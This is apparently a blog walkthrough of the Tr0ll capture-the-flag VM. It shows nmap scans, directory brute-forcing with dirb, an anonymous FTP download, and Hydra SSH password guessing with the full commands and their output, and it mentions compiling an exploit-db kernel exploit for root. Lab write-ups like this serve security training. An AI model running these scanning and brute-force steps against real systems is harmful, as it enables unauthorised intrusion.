[WriteUp] Tr0ll

 

Let’s scan our network to find the machine first.

nmap -sn 172.18.2.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-11 13:39 +03
Nmap scan report for 172.18.2.1
Host is up (0.019s latency).
MAC Address: 00:50:56:01:06:28 (VMware)
Nmap scan report for 172.18.2.144
Host is up (0.00065s latency).
MAC Address: 08:00:27:62:C8:63 (Oracle VirtualBox virtual NIC)
Nmap scan report for 172.18.2.141
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 27.97 seconds

Ok, it’s ip address is 172.18.2.144.

Let’s dig deeper.

nmap -A 172.18.2.144 130 ↵

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-11 13:46 +03
Nmap scan report for 172.18.2.144
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.18.2.141
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 08:00:27:62:C8:63 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 172.18.2.144

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.34 seconds

Ok we have FTP, SSH and HTTP working at their default ports and FTP server allows us to login as anonymous user.

Let’s see what is on the web server.

tr0ll1

Ok, that’s cute. Let’s check the source code.

<html>
<img src=hacker.jpg>
</html>

Meh, nothing.

Rule! If there is a web server, probably there is a robot.txt.

http://172.18.2.144/robots.txt

User-agent:*
Disallow: /secret

Gotcha!

tr0ll2

Seems not. 😦 Source?

<html>
<img src=”troll.jpg”>
</html>

No luck. I tried to download and scan the image with binwalk to see if there is something hidden.

# binwalk troll_original.jpg

DECIMAL HEXADECIMAL DESCRIPTION
——————————————————————————–
0 0x0 JPEG image data, JFIF standard 1.01

Hmm, it seems to be a simple, legit jpg image.

Let me see what else is under the secret directory.

dirb http://172.18.2.144/secret/

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Wed Oct 11 14:09:22 2017
URL_BASE: http://172.18.2.144/secret/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://172.18.2.144/secret/ —-
+ http://172.18.2.144/secret/index.html (CODE:200|SIZE:37)

—————–
END_TIME: Wed Oct 11 14:09:23 2017
DOWNLOADED: 4612 – FOUND: 1

Nothing, other than the simple index.html.

I want to continue with the FTP at this point. As you remember, it allows anonymous login.

# ftp 172.18.2.144
Connected to 172.18.2.144.
220 (vsFTPd 3.0.2)
Name (172.18.2.144:mert): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp>
ftp> bin
200 Switching to Binary mode.
ftp> get lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00114 seconds (6.76 Mbytes/s)
ftp> quit
221 Goodbye.

That was quick and easy. 🙂 Time to fire up Wireshark.

Here is the interesting part of that capture file:

tr0ll3

FTP is a clear-text protocol, so if I tell Wireshark to follow that FTP-DATA TCP stream…

Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛 Sucks, you were so close… gotta TRY HARDER!

Well, this is fun. 🙂

Here are the contents of http://172.18.2.144/sup3rs3cr3tdirlol/

tr0ll4

What is that roflmao? There is only one way to find out; download and play with it.

First of all, let me see what kind of file it is.

# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

It is a binary!

# strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$”
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6590
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
roflmao.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
printf@@GLIBC_2.0
_edata
_fini
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init

Seems like a C code.  I admit I was stuck at this point for awhile as I couldn’t find out what to do next. I tried several things but in the end, it was as simple as typing http://172.18.2.144/0x0856BF/

It was a huge facepalm moment for me as the message told me to find the address 0x0856BF, and I was thinking too complicated. Clearly, by saying “address”, it meant a web address.

Anyway, let’s see the contents.

tr0ll5

In the this_folder_contains_the_password directory, there is a file called Pass.txt, and “Good_job_:)” written in it. Ok, this will be probably our password.

Similarly, good_luck directory has a file called “which_one_lol.txt”, and there are then words written in it. I presume our username will be one of them.

Let’s fire up Hydra and attack the ssh server with this information.

# hydra 172.18.2.144 ssh -L usernames.txt -P passwords.txt
Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-11 14:45:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://172.18.2.144:22/
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-11 14:45:55

Huh? Nothing?

This was the second time I was trolled by this VM. I again fell into it’s trap and started to think too complicated whereas the answer was very simple. The directory was saying “this_folder_contains_the_password”. What does it contain? “Pass.txt”. <insert facepalm here>

Let’s try again with the password “Pass.txt”

# hydra 172.18.2.144 ssh -L usernames.txt -p Pass.txt 255 ↵
Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-11 14:57:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://172.18.2.144:22/
[22][ssh] host: 172.18.2.144 login: overflow password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-11 14:57:14

Oh, sweet victory.

Let’s login.

At this point, I tried to gather information as much as possible, but I had no luck. As the last resort, I searched exploit-db for a vulnerability. The server was running on Ubuntu 14.04.1 LTS.

Fortunately, there was a vulnerability in written in C; the only obstacle was compiling it. I downloaded the exploit to the server and compiled it with gcc.

It compiled fast. And when I ran the exploit, it provided me root access.

There was a file called proof.txt in the root’s home directory. I got it! 🙂

# less proof.txt

Good job, you did it!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s